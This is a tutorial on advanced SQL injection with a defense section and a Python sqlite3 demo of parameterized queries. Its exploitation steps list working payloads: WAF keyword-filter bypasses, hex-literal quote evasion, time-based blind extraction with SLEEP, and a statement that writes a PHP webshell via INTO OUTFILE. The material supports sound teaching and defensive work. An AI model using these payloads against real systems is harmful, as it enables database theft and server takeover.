Advanced Exploitation and Defense Bypass Techniques of SQL Injection Attacks

I. Knowledge Point Description
SQL injection is an attack technique in which malicious SQL fragments are inserted into an application's input parameters, causing the server to execute SQL commands the developer never intended. Advanced exploitation covers data extraction, privilege escalation, and the bypassing of defense mechanisms (such as WAFs and input filters) in more complex scenarios. The core challenge is constructing payloads that still produce a working injection when basic filters (e.g., keyword filtering, escape-character handling) are in place.

II. Step-by-Step Explanation of the Solution Process

Step 1: Identify Injection Points and Filtering Rules

  • Objective: Confirm whether a parameter is vulnerable to SQL injection and probe the defense rules in place (e.g., which keywords and special characters are filtered).
  • Methods:
    1. Submit a single quote ' to observe if an error occurs (e.g., database error messages are exposed).
    2. Attempt basic injection statements (e.g., ' OR 1=1--); if intercepted, it indicates the possible presence of a WAF or input filtering.
    3. Determine filtering rules through error feedback or response delays (time-based blind injection), for example:
      • If UNION SELECT is blocked, try splitting keywords: UNI/**/ON SEL/**/ECT.
      • If spaces are filtered, use comment characters /**/ or tab characters %09 as substitutes.

Step 2: Bypass Keyword Filtering

  • Principle: WAFs typically rely on blacklists to match keywords, which can be bypassed using obfuscation techniques.
  • Methods:
    1. Case Mixing: UnIoN SeLeCT (some WAFs do not normalize case).
    2. Inline Comments (MySQL): /*!UNION*/ /*!SELECT*/ leverages database-specific features.
    3. Encoding Obfuscation: URL encoding (%55%4E%49%4F%4E corresponds to UNION), or nesting a keyword inside itself (UNUNIONION) so that a filter which strips UNION only once leaves UNION behind.
    4. Comment Splitting: U/**/N/**/I/**/O/**/N disrupts keyword detection.

Step 3: Bypass Character Escaping and Quote Restrictions

  • Scenario: Single quotes are escaped (\') or filtered, so string literals cannot be closed directly.
  • Methods:
    1. Numeric Injection: When parameters are numeric (e.g., id=1), directly construct 1 OR 1=1 without quotes.
    2. Hexadecimal Encoding: Convert strings to hexadecimal to avoid quotes, for example:
      • Original statement: ' UNION SELECT username, password FROM users--
      • Bypass: 1 UNION SELECT 1,2 FROM users WHERE username=0x61646D696E (0x61646D696E is the hexadecimal encoding of the string admin; MySQL treats the literal as a string in a string comparison, so no quotes are needed).

Step 4: Advanced Exploitation Using Database Features

  • Objective: Extract data or execute system commands after successful injection.
  • Example (MySQL):
    1. Information Retrieval: Query table and column names via the information_schema database:
       UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema=database()
    2. File Read/Write: Use LOAD_FILE() to read files (e.g., /etc/passwd), or INTO OUTFILE to write a webshell:
       ' UNION SELECT "<?php system($_GET['cmd']); ?>",2 INTO OUTFILE "/var/www/html/shell.php"--
    3. Automated Time-Based Blind Injection: When there is no direct output, extract data character by character using conditional statements and sleep functions (e.g., SLEEP(5)):
       ' OR IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--

Step 5: Comprehensive Defense Bypass Case Study

  • Scenario: Assume the WAF filters UNION, SELECT, and spaces, and escapes single quotes.
  • Bypass Payload:
    1. Use comment characters as space substitutes: /**/.
    2. Obfuscate keywords: /*!UNION*//*!SELECT*/ 1,2,3.
    3. HTTP parameter pollution: submit the same parameter more than once (e.g., ?id=1&id=2); if the WAF inspects one copy while the application uses the other, the WAF's parsing is confused.

III. Summary of Defense Measures

  1. Prepared Statements (parameterized queries): Keep the SQL structure separate from the data values so that user input is never parsed as SQL; this prevents injection at the source.
  2. Whitelist Validation: Strictly validate input types and ranges (e.g., integers, enumerated values) rather than relying on blacklists of keywords or characters.
  3. Principle of Least Privilege: Grant the application's database account only the permissions it needs (in particular, withhold the MySQL FILE privilege that LOAD_FILE() and INTO OUTFILE require, and disallow system command execution).
  4. Defense in Depth for WAFs: Combine semantic analysis and behavioral detection rather than relying solely on keyword matching, which every technique in Step 2 is designed to evade.
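The following is an added illustration (not code from the original page) of measures 1 and 2 above: a string-concatenated query that the ' OR 1=1-- payload from Step 1 subverts, beside the parameterized and whitelist-validated versions that neutralize it. It uses Python's built-in sqlite3 module with a constructed in-memory users table; the table contents are made up for the demo.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed sample schema and rows (not from any real system).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "hunter2"), (2, "alice", "s3cret")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # Vulnerable: the input is spliced into the SQL text, so a quote in the
    # input closes the literal and the remainder is parsed as SQL.
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    # Hardened: SQL structure and the value travel separately; the quote and
    # the OR clause are just characters inside a bound string parameter.
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

def is_valid_id(raw_id: str) -> bool:
    # Whitelist check for a numeric parameter: accept only plain decimal digits,
    # which rules out payloads such as "1 OR 1=1" before they reach the database.
    return raw_id.isdigit()

def lookup_by_id(conn: sqlite3.Connection, raw_id: str) -> list:
    # Validate against the whitelist first, then still bind the value.
    if not is_valid_id(raw_id):
        raise ValueError("id must be a non-negative integer")
    rows = conn.execute("SELECT username FROM users WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"
    print("vulnerable:", lookup_vulnerable(db, payload))  # every user is returned
    print("parameterized:", lookup_safe(db, payload))    # no rows match the literal text
    print("whitelisted id:", lookup_by_id(db, "1"))
```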

Working through the steps above gives a systematic understanding of advanced SQL injection exploitation and bypass techniques, and of why a layered, multi-dimensional defense is necessary.